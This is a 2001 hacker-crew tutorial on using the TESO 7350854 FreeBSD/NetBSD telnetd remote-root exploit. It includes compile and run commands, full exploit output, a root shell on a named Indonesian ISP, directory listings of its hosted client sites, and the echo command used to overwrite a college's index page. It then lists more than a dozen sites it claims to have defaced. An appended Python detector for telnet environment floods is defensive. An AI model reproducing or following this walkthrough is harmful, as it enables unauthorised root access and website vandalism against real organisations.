Title  = Remote root Telnetd

    * bug found by scut 2001/06/09
    * further research by smiler, zip, lorian and me.
    * thanks to zip's cool friend for giving me a testbed to play on
    *
    * tested against: BSDI BSD/OS 4.1
    *                 NetBSD 1.5
    *                 FreeBSD 3.1
    *                 FreeBSD 4.0-REL
    *                 FreeBSD 4.2-REL
    *                 FreeBSD 4.3-BETA
    *                 FreeBSD 4.3-STABLE
    *                 FreeBSD 4.3-RELEASE

AUTHOR = JoeGoeL aka CyberRioT of MedanHacking
File   = Private! only crew
Date   = 2 August 2001
Credit = TESO TEAM SECURITY
Greetz = Cronost,Crafter`13,r3v0lt,dis0rder,Tua-Xiong,Seven_Fly,Breng-Sex,LuVcris,
         tapuz,Joe-Black,w|p,StripCode,Yourname
         WOH(VAndal,[RaFa],FonE_TonE,r00t,n0|d,Nu|l)
FUCk   = INDONESIAN MILITARY
sploit = 7350854.c www.hack.co.za

Having successfully rooted www.melsa.net.id, a provider located in Bandung, and defaced the sites www.bappeda-bandung.go.id, www.polban.ac.id, www.bankbali-bdg.co.id, www.sidola.com and others that are clients of that ISP, let's begin...

1. First get a Unix shell, any kind (Linux, FreeBSD, SCO, SunOS, etc.), then upload the file 7350854.c from www.hack.co.za to that shell and compile it, e.g.

    # gcc -o bsd 7350854.c

2. Scan for hosts running a BSD variant as listed above.
3. Scan ports with a tool that can be found on packetstormsecurity.org; look for pscan.c.
4. If the open port is port 23 (telnetd), it can possibly be exploited for root.
5. Run the exploit, e.g.

    # ./bsd www.target.com

Here is an example that I have exploited:

    [wbones@dblab Tool]$ ./bsd www.polban.ac.id
    7350854 - x86/bsd telnetd remote root
    by zip, lorian, smiler and scut.

    check: PASSED, using 16mb mode

    #############################################################################

    ok baby, times are rough, we send 16mb traffic to the remote
    telnet daemon process, it will spill badly. but then, there is no
    other way, sorry...

    ## setting populators to populate heap address space
    ## number of setenvs (dots / network): 31500
    ## number of walks (percentage / cpu): 496140750
    ##
    ## the percentage is more realistic than the dots ;)

    percent |--------------------------------------------------------| ETA |
     99.37% |....................................................... | 00:00:06 |

:: wait until 100%, then it will look like this:

    ## sleeping for 10 seconds to let the process recover
    ## ok, you should now have a root shell
    ## as always, after hard times, there is a reward...

:: when it looks like this, press enter

    command:
    % ls -al
    total 19047
    drwxr-xr-x  20 root  wheel      512 Jul 31 20:37 .
    drwxr-xr-x  20 root  wheel      512 Jul 31 20:37 ..
    -rw-r--r--   2 root  wheel      658 Nov 20  2000 .cshrc
    -rw-r--r--   2 root  wheel      251 Nov 20  2000 .profile
    -r--r--r--   1 root  wheel     4735 Nov 20  2000 COPYRIGHT
    drwxr-xr-x   2 root  wheel     1024 Jun 20 02:21 bin
    drwxr-xr-x   3 root  wheel      512 Jun 20 02:26 boot
    drwxr-xr-x   2 root  wheel      512 Jun 19 23:57 cdrom
    lrwx------   1 root  wheel       11 Jul 31 15:58 compat -> /usr/compat
    drwxr-xr-x   3 root  wheel    13824 Jul 31 21:01 dev
    drwxr-xr-x   2 root  wheel      512 Jun 19 23:57 dist
    drwxr-xr-x  15 root  wheel     2560 Aug  1 06:00 etc
    drwxr-xr-x   3 root  wheel     4096 Jul 13 09:17 home
    -r-xr-xr-x   1 root  wheel  2086844 Jul 31 20:37 kernel
    -r-xr-xr-x   1 root  wheel  3258128 Nov 20  2000 kernel.GENERIC
    -r-xr-xr-x   1 root  wheel  2062958 Jun 23 11:24 kernel.old
    -r-xr-xr-x   1 root  wheel  2062958 Jun 23 10:51 kernel.prev
    drwxr-xr-x   2 root  wheel      512 Nov 20  2000 mnt
    drwxr-xr-x   2 root  wheel     3072 Jul 31 20:37 modules
    drwxr-xr-x   2 root  wheel     3072 Jun 20 11:37 modules.old
    -rw-r--r--   1 root  wheel    91395 Jun 25 11:33 po-mode.el
    dr-xr-xr-x   1 root  wheel      512 Aug  1 06:29 proc
    -rw-------   1 root  wheel    97360 Jul 31 15:59 restoresymtable
    drwxr-xr-x   5 root  wheel      512 Aug  1 05:30 root
    drwxr-xr-x   2 root  wheel     2048 Jun 20 02:24 sbin
    drwxr-xr-x   4 root  wheel     1024 Jun 19 23:57 stand
    lrwx------   1 root  wheel       11 Jul 31 15:58 sys -> usr/src/sys
    lrwx------   1 root  wheel        8 Jul 31 15:58 tmp -> /var/tmp
    drwxr-xr-x  14 root  wheel      512 Jun 28 17:41 usr
    drwxr-xr-x   4 root  wheel      512 Jun 22 10:22 usr2
    drwxr-xr-x   4 root  wheel      512 Jun 26 11:30 usr3
    drwxr-xr-x  18 root  wheel      512 Jun 20 00:22 var

:: we did it!!!!!!!!!!

    who am i
    root tty?? Aug 1 06:29
    uname -a
    FreeBSD www3.melsa.net.id 4.3-STABLE FreeBSD 4.3-STABLE #4: Tue Jul 31 20:36:18 JAVT 2001 root@www3.melsa.net.id:/usr/src/sys/compile/WWW3 i386

:: got a root shell on the box
:: look for its index.html, usually in the home/www directory

    cd home
    ls -al
    total 12
    drwxr-xr-x   3 root  wheel  4096 Jul 13 09:17 .
    drwxr-xr-x  20 root  wheel   512 Jul 31 20:37 ..
    lrwx------   1 root  wheel    16 Jul 31 15:58 abadi -> /usr2/home/abadi
    lrwx------   1 root  wheel    25 Jul 31 15:58 accounting.csb -> /usr3/home/accounting.csb
    lrwx------   1 root  wheel    18 Jul 31 15:59 adm.csb -> /usr3/home/adm.csb
    lrwx------   1 root  wheel    16 Jul 31 15:58 admin -> /usr2/home/admin
    lrwx------   1 root  wheel    22 Jul 31 15:58 admin.iklan -> /usr3/home/admin.iklan
    lrwx------   1 root  wheel    26 Jul 31 15:58 akunting.bpromo -> /usr3/home/akunting.bpromo
    lrwx------   1 root  wheel    26 Jul 31 15:59 al_reda.gemafia -> /usr3/home/al_reda.gemafia
    lrwx------   1 root  wheel    18 Jul 31 15:59 animbus -> /usr2/home/animbus
    lrwx------   1 root  wheel    17 Jul 31 15:59 anzana -> /usr2/home/anzana
    lrwx------   1 root  wheel    20 Jul 31 15:59 apep.reka -> /usr3/home/apep.reka
    lrwx------   1 root  wheel    19 Jul 31 15:59 aprotech -> /usr2/home/aprotech
    lrwx------   1 root  wheel    15 Jul 31 15:59 aris -> /usr2/home/aris
    lrwx------   1 root  wheel    23 Jul 31 15:59 artforum.bae -> /usr3/home/artforum.bae
    lrwx------   1 root  wheel    20 Jul 31 15:59 askhaindo -> /usr2/home/askhaindo
    lrwx------   1 root  wheel    14 Jul 31 15:59 bae -> /usr2/home/bae
    lrwx------   1 root  wheel    22 Jul 31 15:59 baligarment -> /usr2/home/baligarment
    lrwx------   1 root  wheel    23 Jul 31 15:59 bankbali-bdg -> /usr2/home/bankbali-bdg
    lrwx------   1 root  wheel    18 Jul 31 15:59 bappeda -> /usr2/home/bappeda
    lrwx------   1 root  wheel    17 Jul 31 15:59 bening -> /usr2/home/bening
    lrwx------   1 root  wheel    24 Jul 31 15:59 benny.bethany -> /usr3/home/benny.bethany
    lrwx------   1 root  wheel    21 Jul 31 15:59 bethanydoa -> /usr2/home/bethanydoa
    lrwx------   1 root  wheel    22 Jul 31 15:59 bhima.topaz -> /usr3/home/bhima.topaz
    lrwx------   1 root  wheel    15 Jul 31 15:59 bhtv -> /usr2/home/bhtv
    lrwx------   1 root  wheel    26 Jul 31 15:59 bidang3.bappeda -> /usr3/home/bidang3.bappeda
    lrwx------   1 root  wheel    26 Jul 31 15:59 bidang5.bappeda -> /usr3/home/bidang5.bappeda
    lrwx------   1 root  wheel    18 Jul 31 15:59 bigfash -> /usr2/home/bigfash
    lrwx------   1 root  wheel    15 Jul 31 15:59 bita -> /usr2/home/bita
    lrwx------   1 root  wheel    18 Jul 31 15:59 bowling -> /usr2/home/bowling
    lrwx------   1 root  wheel    19 Jul 31 15:59 boy.reka -> /usr3/home/boy.reka
    lrwx------   1 root  wheel    17 Jul 31 15:59 bpromo -> /usr2/home/bpromo
    lrwx------   1 root  wheel    23 Jul 31 15:59 bptc.bethany -> /usr3/home/bptc.bethany
    lrwx------   1 root  wheel    19 Jul 31 15:59 bratatex -> /usr2/home/bratatex
    lrwx------   1 root  wheel    22 Jul 31 15:59 budi.weaver -> /usr3/home/budi.weaver
    lrwx------   1 root  wheel    26 Jul 31 15:59 buletin.bethany -> /usr3/home/buletin.bethany
    lrwx------   1 root  wheel    17 Jul 31 15:59 busana -> /usr2/home/busana
    lrwx------   1 root  wheel    18 Jul 31 15:59 cci-bdg -> /usr2/home/cci-bdg
    lrwx------   1 root  wheel    15 Jul 31 15:59 cela -> /usr2/hom

:: see, there are polban, bappeda, bankbali-bdg, bethanydoa and others, which are websites
:: then move to the polban directory

    cd polban
    cd webpages
    ls -al
    total 34
    drwxr-xr-x  10 polban  corp  512 Aug  1 04:43 .
    drwxr-xr-x   4 polban  corp  512 May 22  2000 ..
    drwxr-xr-x   2 polban  corp  512 Jun 21 15:18 _borders
    drwxr-xr-x   2 polban  corp  512 Jun 21 15:18 _derived
    drwxr-xr-x   2 polban  corp  512 Jun 21 15:18 _fpclass
    drwxr-xr-x   2 polban  corp  512 Jun 21 15:18 _overlay
    drwxr-xr-x   2 polban  corp  512 Jun 21 15:16 _private
    drwxr-xr-x   3 polban  corp  512 Jun 21 15:18 _themes
    drwxr-xr-x   2 polban  corp  512 Jun 21 15:18 _vti_pvt
    drwxr-xr-x   2 polban  corp  512 Jun 21 15:17 images
    -rw-r--r--   1 root    corp   75 Aug  1 04:43 index.html
    -rw-r--r--   1 polban  corp  992 Jun 21 15:18 index.old
    -rw-r--r--   1 root    corp  167 Aug  1 04:00 medan.htm
    -rw-r--r--   1 root    corp   70 Aug  1 03:45 read.htm
    -rw-r--r--   1 root    corp   77 Aug  1 03:47 surat.htm
    -rw-r--r--   1 root    corp  117 Aug  1 03:54 warna.htm
    -rw-r--r--   1 root    corp   18 Aug  1 03:52 yoyo

:: it turns out the index is located here....
:: do the deface :)) LoL heheheheh
   You pig, wepe, don't you bother my nancy!!! (a little warning for those who like to meddle)
::: let's deface!!!!!!!!

    echo " JoeGoeL,Cronost,Crafter`13,r3v0lt,Tua-Xiong and dis0rder own U poltek Bandung Find Us at Medanhacking on Irc.dal.net greetz All Medanhacking Crew " > index.html

:: done!!! open www.polban.ac.id, it will look like the above
:: below are the ones I defaced
:: to go back to our shell, press Ctrl+C

    [wbones@dblab Tool]$

www.bappeda-bandung.go.id
www.bankbali-bdg.co.id
www.polban.ac.id
http://www.netweaver.web.id/
http://www.priokport.co.id/
www.rdb.or.id/
www.pltp-kamojang.co.id/
www.mbt-kons.co.id/
http://www.metamasa.com/
http://www.ultima.co.id/
http://www.p5d.or.id/
http://www.quasar.co.id/
http://www.bae.or.id/
http://www.bita.co.id/
http://www.mbt-kons.co.id/
http://www.mkn.co.id/
http://www.situsfoto.com/

::: Ok see Ya
Viva MedanHacking Crew, find it at http://medanhacking.has.it
::: To Romi aka Seven_Fly: how about the Linux and Perl books? Have they arrived yet?
::: To dis0rder: please translate this into English and Hebrew!!!!!!!!!!!!

Copyright JoeGoeL aka CyberRioT, CyberRioT@apexmail.com 2001
See you in another tutorial!!!!!
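The exploit output above reports 31500 setenvs and 16mb of traffic sent to the telnet daemon before any login takes place, which is a strong pre-authentication signal for a defender. As an added example (not part of the original post and not TESO's code), the following counts environment-option subnegotiations in a captured client-to-server telnet byte stream and flags sessions above assumed thresholds. That the setenvs travel as ENVIRON/NEW-ENVIRON subnegotiations, the threshold values, and all function names are assumptions.

```python
# Added example (not from the original post): flag telnet clients that flood
# the daemon with environment-option subnegotiations before login.
IAC, SB, SE = 255, 250, 240
NEGOTIATE = (251, 252, 253, 254)     # WILL, WONT, DO, DONT
ENV_OPTS = (36, 39)                  # ENVIRON (RFC 1408), NEW-ENVIRON (RFC 1572)
MAX_ENV_SUBNEGS = 50                 # assumed threshold, tune per site
MAX_PRELOGIN_BYTES = 1_000_000       # assumed threshold, tune per site

def count_env_subnegs(stream: bytes) -> int:
    """Count complete IAC SB <env option> ... IAC SE blocks sent by a client."""
    count, i, n = 0, 0, len(stream)
    while i + 1 < n:
        if stream[i] != IAC:
            i += 1
            continue
        cmd = stream[i + 1]
        if cmd in NEGOTIATE:
            i += 3                   # IAC <verb> <option>
        elif cmd == SB and i + 2 < n:
            opt, j = stream[i + 2], i + 3
            while j + 1 < n and (stream[j] != IAC or stream[j + 1] != SE):
                # IAC IAC inside a subnegotiation is an escaped 0xFF data byte
                j += 2 if stream[j] == IAC and stream[j + 1] == IAC else 1
            if j + 1 >= n:
                break                # unterminated block: stop parsing
            if opt in ENV_OPTS:
                count += 1
            i = j + 2
        else:
            i += 2                   # IAC IAC or another two-byte command
    return count

def assess_session(stream: bytes) -> list:
    """Return the reasons a pre-login client byte stream looks abusive."""
    reasons = []
    if count_env_subnegs(stream) > MAX_ENV_SUBNEGS:
        reasons.append("env-flood")
    if len(stream) > MAX_PRELOGIN_BYTES:
        reasons.append("volume")
    return reasons

def env_subneg(name: bytes, value: bytes) -> bytes:
    """Build one NEW-ENVIRON IS VAR name VALUE value block (constructed input)."""
    return bytes([IAC, SB, 39, 0, 0]) + name + b"\x01" + value + bytes([IAC, SE])

# Constructed sample streams, not captured traffic.
NORMAL = bytes([IAC, 251, 39]) + env_subneg(b"USER", b"alice") + b"alice\r\n"
FLOOD = env_subneg(b"A", b"B" * 40) * 31500   # count taken from the output above

if __name__ == "__main__":
    for label, s in (("normal", NORMAL), ("flood", FLOOD)):
        print(label, len(s), count_env_subnegs(s), assess_session(s))
```

Feed it the reassembled client side of each TCP session to port 23 up to the point the login prompt is answered.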